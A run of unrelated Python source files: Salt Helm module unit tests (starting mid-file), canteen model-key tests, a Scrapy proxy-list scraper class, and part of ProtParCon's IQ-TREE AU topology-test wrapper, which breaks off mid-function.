with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.get_all("release"))
self.assertEqual(
[call(commands=["get", "all", "release"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_get_hooks(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.get_hooks("release"))
self.assertEqual(
[call(commands=["get", "hooks", "release"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_get_manifest(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.get_manifest("release"))
self.assertEqual(
[
call(
commands=["get", "manifest", "release"],
flags=None,
kvflags=None,
)
],
magic_mock.mock_calls,
)
def test_get_notes(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.get_notes("release"))
self.assertEqual(
[call(commands=["get", "notes", "release"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_get_values(self):
magic_mock = MagicMock(return_value={"test": True})
with patch("salt.modules.helm._exec_dict_return", magic_mock):
self.assertEqual({"test": True}, helm.get_values("release"))
self.assertEqual(
[call(commands=["get", "values", "release"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_help_(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.help_("command"))
self.assertEqual(
[call(commands=["help", "command"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_history(self):
magic_mock = MagicMock(return_value={"test": True})
with patch("salt.modules.helm._exec_dict_return", magic_mock):
self.assertEqual({"test": True}, helm.history("release"))
self.assertEqual(
[call(commands=["history", "release"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_install(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.install("release", "chart"))
self.assertEqual(
[
call(
commands=["install", "release", "chart"],
flags=None,
kvflags=None,
)
],
magic_mock.mock_calls,
)
def test_lint(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.lint("path"))
self.assertEqual(
[call(commands=["lint", "path"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_list_(self):
magic_mock = MagicMock(return_value={"test": True})
with patch("salt.modules.helm._exec_dict_return", magic_mock):
self.assertEqual({"test": True}, helm.list_())
self.assertEqual(
[call(commands=["list"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_package(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.package("chart"))
self.assertEqual(
[call(commands=["package", "chart"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_plugin_install(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.plugin_install("path"))
self.assertEqual(
[
call(
commands=["plugin", "install", "path"], flags=None, kvflags=None
)
],
magic_mock.mock_calls,
)
def test_plugin_list(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.plugin_list())
self.assertEqual(
[call(commands=["plugin", "list"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_plugin_uninstall(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.plugin_uninstall("plugin"))
self.assertEqual(
[
call(
commands=["plugin", "uninstall", "plugin"],
flags=None,
kvflags=None,
)
],
magic_mock.mock_calls,
)
def test_plugin_update(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.plugin_update("plugin"))
self.assertEqual(
[
call(
commands=["plugin", "update", "plugin"],
flags=None,
kvflags=None,
)
],
magic_mock.mock_calls,
)
def test_pull(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.pull("pkg"))
self.assertEqual(
[call(commands=["pull", "pkg"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_repo_add(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.repo_add("name", "url"))
self.assertEqual(
[
call(
commands=["repo", "add", "name", "url"],
flags=None,
kvflags=None,
)
],
magic_mock.mock_calls,
)
def test_repo_index(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.repo_index("directory"))
self.assertEqual(
[
call(
commands=["repo", "index", "directory"],
flags=None,
kvflags=None,
)
],
magic_mock.mock_calls,
)
def test_repo_list(self):
magic_mock = MagicMock(return_value={"test": True})
with patch("salt.modules.helm._exec_dict_return", magic_mock):
self.assertEqual({"test": True}, helm.repo_list())
self.assertEqual(
[call(commands=["repo", "list"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_repo_remove(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.repo_remove("name"))
self.assertEqual(
[call(commands=["repo", "remove", "name"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_repo_update(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.repo_update())
self.assertEqual(
[call(commands=["repo", "update"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_repo_manage_present_bad_list(self):
with patch("salt.modules.helm.repo_list", MagicMock(return_value=None)):
with self.assertRaises(CommandExecutionError):
helm.repo_manage(present=["test"])
def test_repo_manage_present_bad_format(self):
with patch("salt.modules.helm.repo_list", MagicMock(return_value=None)):
with self.assertRaises(CommandExecutionError):
helm.repo_manage(present=[{"test": True}])
def test_repo_manage_present_failed(self):
result_wanted = {
"present": [],
"added": [],
"absent": [],
"removed": [],
"failed": [{"name": "myname", "url": "myurl"}],
}
with patch("salt.modules.helm.repo_list", MagicMock(return_value=None)):
with patch("salt.modules.helm.repo_add", MagicMock(return_value="failed")):
self.assertEqual(
helm.repo_manage(present=[{"name": "myname", "url": "myurl"}]),
result_wanted,
)
def test_repo_manage_present_succeed(self):
result_wanted = {
"present": [],
"added": [{"name": "myname", "url": "myurl"}],
"absent": [],
"removed": [],
"failed": [],
}
with patch("salt.modules.helm.repo_list", MagicMock(return_value=None)):
with patch("salt.modules.helm.repo_add", MagicMock(return_value=True)):
self.assertEqual(
helm.repo_manage(present=[{"name": "myname", "url": "myurl"}]),
result_wanted,
)
def test_repo_manage_present_already_present(self):
result_wanted = {
"present": [{"name": "myname", "url": "myurl"}],
"added": [],
"absent": [],
"removed": [],
"failed": [],
}
with patch(
"salt.modules.helm.repo_list",
MagicMock(return_value=[{"name": "myname", "url": "myurl"}]),
):
self.assertEqual(
helm.repo_manage(present=[{"name": "myname", "url": "myurl"}]),
result_wanted,
)
def test_repo_manage_prune(self):
result_wanted = {
"present": [],
"added": [],
"absent": [],
"removed": ["myname"],
"failed": [],
}
with patch(
"salt.modules.helm.repo_list",
MagicMock(return_value=[{"name": "myname", "url": "myurl"}]),
):
with patch("salt.modules.helm.repo_remove", MagicMock(return_value=True)):
self.assertEqual(helm.repo_manage(prune=True), result_wanted)
def test_repo_manage_absent(self):
result_wanted = {
"present": [],
"added": [],
"absent": ["myname"],
"removed": [],
"failed": [],
}
with patch("salt.modules.helm.repo_list", MagicMock(return_value=None)):
with patch("salt.modules.helm.repo_remove", MagicMock(return_value=False)):
self.assertEqual(helm.repo_manage(absent=["myname"]), result_wanted)
def test_repo_manage_removed(self):
result_wanted = {
"present": [],
"added": [],
"absent": [],
"removed": ["myname"],
"failed": [],
}
with patch("salt.modules.helm.repo_list", MagicMock(return_value=None)):
with patch("salt.modules.helm.repo_remove", MagicMock(return_value=True)):
self.assertEqual(helm.repo_manage(absent=["myname"]), result_wanted)
def test_rollback(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.rollback("release", "revision"))
self.assertEqual(
[
call(
commands=["rollback", "release", "revision"],
flags=None,
kvflags=None,
)
],
magic_mock.mock_calls,
)
def test_search_hub(self):
magic_mock = MagicMock(return_value={"test": True})
with patch("salt.modules.helm._exec_dict_return", magic_mock):
self.assertEqual({"test": True}, helm.search_hub("keyword"))
self.assertEqual(
[call(commands=["search", "hub", "keyword"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_search_repo(self):
magic_mock = MagicMock(return_value={"test": True})
with patch("salt.modules.helm._exec_dict_return", magic_mock):
self.assertEqual({"test": True}, helm.search_repo("keyword"))
self.assertEqual(
[
call(
commands=["search", "repo", "keyword"], flags=None, kvflags=None
)
],
magic_mock.mock_calls,
)
def test_show_all(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.show_all("chart"))
self.assertEqual(
[call(commands=["show", "all", "chart"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_show_chart(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.show_chart("chart"))
self.assertEqual(
[call(commands=["show", "chart", "chart"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_show_readme(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.show_readme("chart"))
self.assertEqual(
[call(commands=["show", "readme", "chart"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_show_values(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.show_values("chart"))
self.assertEqual(
[call(commands=["show", "values", "chart"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_status(self):
magic_mock = MagicMock(return_value={"test": True})
with patch("salt.modules.helm._exec_dict_return", magic_mock):
self.assertEqual({"test": True}, helm.status("release"))
self.assertEqual(
[call(commands=["status", "release"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_template(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.template("name", "chart"))
self.assertEqual(
[
call(
commands=["template", "name", "chart"], flags=None, kvflags=None
)
],
magic_mock.mock_calls,
)
def test_test(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.test("release"))
self.assertEqual(
[call(commands=["test", "release"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_uninstall(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.uninstall("release"))
self.assertEqual(
[call(commands=["uninstall", "release"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_upgrade(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.upgrade("release", "chart"))
self.assertEqual(
[
call(
commands=["upgrade", "release", "chart"],
flags=None,
kvflags=None,
)
],
magic_mock.mock_calls,
)
def test_verify(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.verify("path"))
self.assertEqual(
[call(commands=["verify", "path"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_version(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.version())
self.assertEqual(
[call(commands=["version"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
|
<filename>canteen_tests/test_model/test_key.py
# -*- coding: utf-8 -*-
"""
model key tests
~~~~~~~~~~~~~~~
tests canteen's model keys.
:author: <NAME> <<EMAIL>>
:copyright: (c) <NAME>, 2014
:license: This software makes use of the MIT Open Source License.
A copy of this license is included as ``LICENSE.md`` in
the root of the project.
"""
# canteen keys
from canteen import model
from canteen.model import Key
from canteen.model import exceptions
from canteen.model import AbstractKey
# canteen tests
from canteen.test import FrameworkTest
## KeyTests
class KeyTests(FrameworkTest):
""" Tests `model.Key` and `model.AbstractKey`. """
def test_construct_key(self):
""" Test constructing a `Key` manually """
# test kinded empty key
k = Key("TestKind")
self.assertEqual(k.kind, "TestKind")
# test kinded ID'd key
k = Key("TestKind", "sample")
self.assertEqual(k.kind, "TestKind")
self.assertEqual(k.id, "sample")
# test parented, kinded ID'd key
pk = Key("TestParentKind", "parent")
k = Key("TestKind", "child", parent=pk)
self.assertEqual(k.kind, "TestKind")
self.assertEqual(k.id, "child")
self.assertEqual(k.parent, pk)
# make sure basic properties are ok
self.assertEqual(k.__slots__, set())
self.assertEqual(k.__class__.__name__, "Key")
self.assertEqual(k.__class__.__slots__, set())
def test_key_inheritance(self):
""" Test proper inheritance structure for `Key` """
# test basic key inheritance
k = Key("TestKind", "sample")
# test basic inheritance
self.assertIsInstance(k, Key)
self.assertIsInstance(k, AbstractKey)
self.assertIsInstance(k, object)
# test class inheritance
self.assertTrue(issubclass(Key, AbstractKey))
self.assertTrue(AbstractKey in Key.__bases__)
self.assertIsInstance(Key, AbstractKey.__metaclass__)
# check `AbstractKey` inheritance
self.assertTrue(type(k) == Key)
self.assertTrue(issubclass(Key, object))
def test_key_stringify(self):
""" Test string representation of a `Key` object """
# build and stringify key
k = Key("SampleKind", "sample_id")
x = str(k)
# make sure the kind is somewhere
self.assertTrue(("kind" in x))
self.assertTrue(("SampleKind" in x))
# make sure the ID is somewhere
self.assertTrue(("id" in x))
self.assertTrue(("sample_id" in x))
# make sure the key class is somewhere
self.assertTrue(('Key' in x))
def test_key_class_stringify(self):
""" Test the string representation of a `Key` class """
# build and stringify key
x = str(Key)
# make sure the kind is somewhere
self.assertTrue(("kind" in x))
# make sure the ID is somewhere
self.assertTrue(("id" in x))
# make sure the key class is somewhere
self.assertTrue(('Key' in x))
def test_abstract_key(self):
""" Test that `AbstractKey` works abstractly """
# should not be able to instantiate `AbstractKey`
with self.assertRaises(exceptions.AbstractConstructionFailure):
AbstractKey()
self.assertIsInstance(Key(), AbstractKey)
def test_abstract_key_concrete(self):
""" Test that `AbstractKey` works concretely """
# sample `Key` subclass
class SampleKey(AbstractKey):
""" Tests subclasses of `AbstractKey`. """
__schema__ = ('id', 'kind')
# perform tests
self.assertTrue(SampleKey("Sample", "id"))
self.assertIsInstance(SampleKey("Sample", "id"), Key)
self.assertTrue(hasattr(SampleKey, '__schema__'))
self.assertEqual(len(SampleKey.__schema__), 2)
def test_key_concrete(self):
""" Test that `Key` works concretely """
# sample `Key` subclass
class SampleKey(Key):
""" Tests subclasses of `Key`. """
__schema__ = ('id', 'kind')
# perform tests
self.assertTrue(SampleKey("Sample", "id"))
self.assertIsInstance(SampleKey("Sample", "id"), Key)
self.assertTrue(hasattr(SampleKey, '__schema__'))
self.assertEqual(len(SampleKey.__schema__), 2)
def test_raw_key_format(self):
""" Test constructing a key from a raw iterable """
# sample key
k = Key("Sample", "sample")
# tupled raw
self.assertEqual(Key(raw=k.flatten()), k)
self.assertEqual(Key.from_raw(k.flatten()), k)
# joined raw
joined, struct = k.flatten(True)
self.assertEqual(Key(raw=joined), k)
self.assertEqual(Key.from_raw(joined), k)
def test_urlsafe_key_format(self):
""" Test constructing a key from its encoded form """
# sample key
k = Key("Sample", "sample")
# urlsafe in & out
self.assertEqual(Key(urlsafe=k.urlsafe()), k)
self.assertEqual(Key.from_urlsafe(k.urlsafe()), k)
def test_key_flatten(self):
""" Test flattening a Key into a raw iterable """
# sample key
k = Key("Sample", "sample")
# flatten in & out
self.assertEqual(Key(raw=k.flatten()), k)
self.assertEqual(Key.from_raw(k.flatten()), k)
def test_key_nonzero(self):
""" Test nonzero functionality in a key """
# sample zero key and nonzero key
k, nk = Key("Sample"), Key("Sample", "sample")
# key with no ID should evaluate to falsy
self.assertTrue(nk)
self.assertTrue(not k)
def test_key_len(self):
""" Test length of a `Key`, which should be 0 for an incomplete key """
k, nk = Key("Sample"), Key("Sample", "sample")
# a key with no ID should evaluate to 0 via len()
self.assertEqual(len(k), 0)
self.assertEqual(len(nk), 1)
def test_key_with_model_class_kind(self):
""" Test making a `Key` via using a model class as the kind """
## KindedModel
# Used to test using classes for kinds in `model.Key`.
class KindedModel(model.Model):
""" Sample for testing key creation from model classes. """
string = basestring
# make keys
k1 = model.Key("KindedModel", "test_id")
k2 = model.Key(KindedModel, "test_id")
ko = model.Key(KindedModel)
# test keys
self.assertEqual(k1.kind, "KindedModel")
self.assertEqual(k1.id, "test_id")
self.assertEqual(k2.kind, k1.kind)
self.assertEqual(ko.kind, k1.kind)
self.assertEqual(k2.id, k2.id)
def test_key_ancestry(self):
""" Test `Key` ancestry mechanisms """
# manufacture keys
pk = model.Key("ParentKind", "parent_id")
ck = model.Key("ChildKind", "child_id", parent=pk)
gk = model.Key("GrandchildKind", "grandchild_id", parent=ck)
ggk = model.Key("GreatGrandchildKind", "great_grandchild_id", parent=gk)
# for each key, make sure parent is set
self.assertEqual(pk.parent, None)
self.assertEqual(ck.parent, pk)
self.assertEqual(gk.parent, ck)
self.assertEqual(ggk.parent, gk)
# for each key, make sure ancestry works
pk_ancestry = [i for i in pk.ancestry]
ck_ancestry = [i for i in ck.ancestry]
gk_ancestry = [i for i in gk.ancestry]
ggk_ancestry = [i for i in ggk.ancestry]
# test ancestry paths
self.assertEqual(len(pk_ancestry), 1)
self.assertEqual(len(ck_ancestry), 2)
self.assertEqual(len(gk_ancestry), 3)
self.assertEqual(len(ggk_ancestry), 4)
# len of a key should always be 1 unless it has ancestry,
# then it's the length of the ancestry chain
self.assertEqual(len(pk), 1)
self.assertEqual(len(ck), 2)
self.assertEqual(len(gk), 3)
self.assertEqual(len(ggk), 4)
# ... however all keys should test nonzero-ness (all keys should be nonzero)
for k in (pk, ck, gk, ggk):
self.assertTrue(k)
def test_key_with_overflowing_schema(self):
""" Test construction of a `Key` with too many schema items """
# try and make a key with a ton of arguments
with self.assertRaises(TypeError):
model.Key(*("SampleKind",
"id",
"coolstring",
"whatdowedo",
"whenwehave",
"thismanyarguments"))
def test_key_construct_multiple_formats(self):
""" Test constuction of a `Key` with multiple formats """
# sample key
ok = model.Key("Sample", "sample_id")
# try and make a key with multiple formats
with self.assertRaises(TypeError):
model.Key(raw=ok.flatten(False)[1], urlsafe=ok.urlsafe())
def test_key_auto_id(self):
""" Test an integer-based ID field """
class AutoincrementTest(model.Model):
""" Test that keys autoincrement properly when not assigned
deterministic name values. """
message = basestring, {'default': 'Hello, world!'}
# put deterministic key
a = AutoincrementTest(key=model.Key(AutoincrementTest.kind(),
'testing-string-key'))
dk = a.put()
# put nondeterministic key #1
nk = AutoincrementTest().put()
# put nondeterministic key #2
nk2 = AutoincrementTest().put()
self.assertIsInstance(nk.id, int) # nondeterministic should be an int
self.assertIsInstance(dk.id, basestring) # deterministic should be a string
self.assertTrue((nk2.id > nk.id)) # should be greater
def test_key_adapter(self):
""" Test that the adapter is attached correctly to `Key` """
# build test obj
k = model.Key("TestKind", "test")
# make sure an adapter is attached at the class level
self.assertTrue(hasattr(model.Key, '__adapter__'))
self.assertIsInstance(model.Key.__adapter__, model.adapter.ModelAdapter)
# make sure the same is true at the object level
self.assertTrue(hasattr(k, '__adapter__'))
self.assertIsInstance(model.Key.__adapter__, model.adapter.ModelAdapter)
def test_key_equality(self):
""" Test that keys equal each other when they should """
conditions = []
# test with determininstic ID
k1 = model.Key("TestKind", "blabs")
k2 = model.Key("TestKind", "blabs")
conditions.append((k1 == k2))
# test kinded keys
k3 = model.Key("TestKind")
k4 = model.Key("TestKind")
conditions.append((k3 == k4))
# test ancestored keys
k5 = model.Key("TestSubkind", "blobs", parent=k1)
k6 = model.Key("TestSubkind", "blobs", parent=k2)
conditions.append((k5 == k6))
[self.assertTrue(condition) for condition in conditions]
def test_key_inequality(self):
""" Test that keys don't equal each other when they shouldn't """
conditions = []
# test with determininstic ID
k1 = model.Key("TestKind", "blabs")
k2 = model.Key("TestKind", "blobs")
conditions.append((k1 != k2))
# test kinded keys
k3 = model.Key("TestKind")
k4 = model.Key("TestOtherKind")
conditions.append((k3 != k4))
# test ancestored keys with different IDs
k5 = model.Key("TestSubkind", "blabs", parent=k1)
k6 = model.Key("TestSubkind", "blobs", parent=k1)
conditions.append((k5 != k6))
# test ancestored keys with different kinds
k7 = model.Key("TestSubkindOne", "blabs", parent=k1)
k8 = model.Key("TestSubkindTwo", "blabs", parent=k1)
conditions.append((k7 != k8))
# test ancestored keys with different parents
k9 = model.Key("TestSubkind", "blabs", parent=k1)
k10 = model.Key("TestSubkind", "blabs", parent=k2)
conditions.append((k9 != k10))
[self.assertTrue(condition) for condition in conditions]
def test_key_format(self):
""" Test format specification on `Key` """
# build object
k1 = model.Key("Test", "testkey")
# test class
self.assertTrue(hasattr(model.Key, '__schema__'))
self.assertIsInstance(model.Key.__schema__, tuple)
self.assertTrue((len(model.Key.__schema__) > 1))
# test object
self.assertTrue(hasattr(k1, '__schema__'))
self.assertIsInstance(model.Key.__schema__, tuple)
self.assertTrue((len(model.Key.__schema__) > 1))
def test_key_set_unknown_attribute(self):
""" Test setting an unknown and known attribute on a `Key` """
k = model.Key("CoolKind", "coolid")
with self.assertRaises(AttributeError):
k.blabble = True # try writing unknown attribute
def test_key_overwrite_known_attribute(self):
""" Test overwriting a known (schema-d) attribute on a `Key` """
k = model.Key("CoolKind", "coolid")
with self.assertRaises(AttributeError):
k.kind = "MyKind"
with self.assertRaises(AttributeError):
k.id = 10
def test_key_set_attribute_persisted(self):
""" Test setting a valid attribute on a persisted `Key` """
class PersistedKeyTest(model.Model):
""" Test model for making sure writing to a persisted key fails. """
message = basestring, {'default': 'Hello, world!'}
with self.assertRaises(AttributeError):
k = PersistedKeyTest().put()
k.id = 5
with self.assertRaises(AttributeError):
k = PersistedKeyTest().put()
k._set_internal('kind', "Blabs")
with self.assertRaises(AttributeError):
k = PersistedKeyTest().put()
k._set_internal("id", 25)
|
from typing import Optional, List, Type
from scrapy import signals, Spider
from scrapy.crawler import CrawlerProcess
from scrapy.signalmanager import dispatcher
from proxy_parse.proxy.abc import ABCProxyParser
from proxy_parse.spiders import (
FreeProxyListSpider,
BlogSpotSpider,
ProxySearcherSpider,
HideMySpider,
)
class ProxyParser(ABCProxyParser):
proxies: List[str] = []
def __init__(
self,
path_to_file: Optional[str] = None,
proxy_limit: int = 0,
scrapy_spiders: Optional[List[Type[Spider]]] = None,
scrapy_settings: Optional[dict] = None,
):
"""
:param path_to_file: Path to file to save proxies,
if not specified, the proxies will not be saved to the file
:param proxy_limit: Limit of returned proxies from the "parse" method,
if 0, no limit
:param scrapy_settings: Allows you to set custom settings for scrapy.CrawlerProcess
:param scrapy_spiders: You can add your own spiders. Examples can be found
in the "proxy_parser.spiders" folder
"""
self.path_to_file: Optional[str] = path_to_file
self.proxy_limit: int = proxy_limit
if scrapy_settings:
self.settings: Optional[dict] = scrapy_settings
else:
self.settings: Optional[dict] = {
"RETRY_TIMES": 10,
"RETRY_HTTP_CODES": [500, 503, 504, 400, 403, 404, 408],
"LOG_ENABLED": False
}
if path_to_file:
self.settings["FEEDS"] = {
path_to_file: {"format": path_to_file.split(".")[1]}
}
self.settings["FEED_EXPORT_ENCODING"] = "utf-8"
self.settings["FEED_EXPORT_FIELDS"] = ["proxy"]
self.settings["FEED_EXPORTERS"] = {
"json": "proxy_parser.exporters.JsonExporter",
"jsonlines": "proxy_parser.exporters.JsonLinesExporter",
}
self.spiders = [
FreeProxyListSpider,
BlogSpotSpider,
ProxySearcherSpider,
ProxySearcherSpider,
HideMySpider,
]
if scrapy_spiders:
self.spiders.extend(scrapy_spiders)
def parse(self) -> List[str]:
"""
:return: List of verified proxies
"""
self._write_to_file("start")
dispatcher.connect(self._crawler_results, signal=signals.item_scraped)
process = CrawlerProcess(settings=self.settings)
for spider in self.spiders:
process.crawl(spider)
process.start()
if self.proxy_limit:
self.proxies = self.proxies[: self.proxy_limit]
self._write_to_file("finish")
return self.proxies
def _write_to_file(self, action: str) -> None:
if not self.path_to_file or self.path_to_file.startswith(("ftp", "s3", "gs")):
return
if action == "start":
if self.path_to_file.endswith(".json"):
with open(self.path_to_file, "wb") as file:
file.write(b"[")
return
if self.path_to_file.endswith(".json"):
with open(self.path_to_file, "ab+") as file:
file.truncate(file.tell() - 1)
file.write(b"\n]")
def _crawler_results(self, signal, sender, item, response, spider) -> None:
self.proxies.append(item["proxy"])
|
<reponame>iBiology/ProtParCon
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Providing a common interface for performing topology test (`AU test`_) over
protein alignments using various programs.
Users are asked to provide a multiple sequence alignment (MSA) file, a NEWICK
format tree file, and a topology test program's executable. If only one tree
in the tree file was provided, a maximum-likelihood (ML) tree would be inferred
and AU test will be performed to test the difference between the user specified
tree and the ML tree. If a set of trees in NEWICK format was provided in the
tree file, only these trees would be evaluated without reconstructing the ML
tree. In both cases, only the p-value of AU test for the first tree will be
returned.
Users are recommended only to use function ``aut()`` and avoid to use any
private functions inside the module. However, users are recommended to
implement new private functions for additional topology test programs that
they are interested and incorporate them into the general use function
``aut()``.
.. _`AU test`: https://academic.oup.com/sysbio/article/51/3/492/1616895
"""
import os
import sys
import shutil
import random
import logging
import tempfile
import argparse
from io import StringIO
from subprocess import PIPE, Popen
try:
from textwrap import indent
except ImportError:
from ProtParCon.utilities import indent
from ProtParCon.utilities import basename, Tree
from ProtParCon.mlt import mlt
from Bio import Phylo
LEVEL = logging.INFO
LOGFILE, LOGFILEMODE = '', 'w'
HANDLERS = [logging.StreamHandler(sys.stdout)]
if LOGFILE:
HANDLERS.append(logging.FileHandler(filename=LOGFILE, mode=LOGFILEMODE))
logging.basicConfig(format='%(asctime)s %(levelname)s %(name)s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S', handlers=HANDLERS, level=LEVEL)
logger = logging.getLogger('[iMC]')
warn, info, error = logger.warning, logger.info, logger.error
def _iqtree(exe, msa, tree, model, seed):
"""
Perform topology test (AU test) using IQ-TREE_.
:param msa: str, path to a FASTA format MSA file.
:param tree: str, path to a NEWICK format tree file.
:param exe: str, path to a topology test program's executable.
:param model: str, name of the model or path of the model file.
:param seed: int, the seed used to initiate the random number generator.
:return: tuple, p-value of the AU test (float), first tree (string), and
second tree (string).
.. _IQ-TREE: www.iqtree.org/
"""
trees = Phylo.parse(tree, 'newick')
number = sum(1 for t in trees)
wd = tempfile.mkdtemp(dir=os.path.dirname(os.path.abspath(msa)))
args = [exe, '-s', 'msa.fasta', '-zb', '10000', '-au', '-nt', '1', '-pre',
'autest', '-n', '0']
if model:
args.extend(['-m', model])
else:
args.extend(['-m', 'TEST'])
shutil.copy(msa, os.path.join(wd, 'msa.fasta'))
t1, t2 = '', ''
if number == 1:
info('One tree found in tree file, inferring ML tree.')
mltree = mlt(exe, msa, model=model)
if mltree:
trees = os.path.join(wd, 'trees.newick')
if isinstance(tree, str):
with open(tree) as f1:
t1 = f1.readline().rstrip()
else:
t1 = tree.format('newick').rstrip()
with open(trees, 'w') as o, open(mltree) as f2:
t2 = f2.read().strip()
o.write('{}\n{}\n'.format(t1, t2))
args.extend(['-z', 'trees.newick'])
else:
error('Infer ML tree failed, AU TEST aborted.')
sys.exit(1)
else:
with open(tree) as f:
t1, t2 = f.readline().strip(), f.readline().strip()
shutil.copy(tree, os.path.join(wd, 'trees.newick'))
args.extend(['-z', 'trees.newick'])
try:
info('Running AU TEST (IQ-TREE) using the following command:\n\t'
'{}'.format(' '.join(args)))
process = Popen(args, cwd=wd, stdout=PIPE, stderr=PIPE,
universal_newlines=True)
code = process.wait()
if code:
msg = indent(process.stderr.read(), prefix='\t')
error('Topology test (AU TEST) failed for {}\n{}'.format(msa, msg))
sys.exit(1)
else:
info('Parsing tree topology test (AU TEST) results.')
with open(os.path.join(wd, 'autest.iqtree')) as f:
for line in f:
if 'USER TREES' in line:
break
for line in f:
if line.strip().startswith('1'):
aup = float(line.split()[-2])
return aup, t1, t2
error('Parsing tree topology test (AU TEST) failed, no test'
'result found.')
sys.exit(1)
except OSError:
error('Invalid IQ-TREE executable (exe) {}, topology test (AU TEST) '
'failed for {}.'.format(exe, msa))
sys.exit(1)
finally:
shutil.rmtree(wd)
def aut(exe, msa, tree, model='', seed=0, outfile='', verbose=False):
"""
General use function for performing topology test (AU test).
:param msa: str, path to a FASTA format MSA file.
:param tree: str, path to a NEWICK format tree file.
:param exe: str, path to a topology test program's executable.
:param model: str, name of the model or path of the model file.
:param seed: int, the seed used to initiate the random number generator.
:param outfile: str, path to the output file for storing test result.
If not set, only return the result without save to a file.
:param verbose: bool, invoke verbose or silent process mode,
default: False, silent mode.
:return: tuple, p-value of the AU test (float), first tree (string), and
second tree (string).
"""
logger.setLevel(logging.INFO if verbose else logging.ERROR)
if os.path.isfile(msa):
msa = os.path.abspath(msa)
else:
error('Alignment {} is not a file or does not exist.'.format(msa))
sys.exit(1)
if not os.path.isfile(tree):
error('Tree {} is not a file a does not exist.'.format(tree))
sys.exit(1)
if not isinstance(model, str):
error('Argument model accepts a string for the name of the model or '
'path of the model file')
sys.exit(1)
try:
seed = int(seed) if seed else random.randint(0, 1000000)
except ValueError:
warn('Invalid seed, generating seed using random number generator.')
seed = random.randint(0, 1000000)
aup, t1, t2 = _iqtree(exe, msa, tree, model, seed)
if outfile:
try:
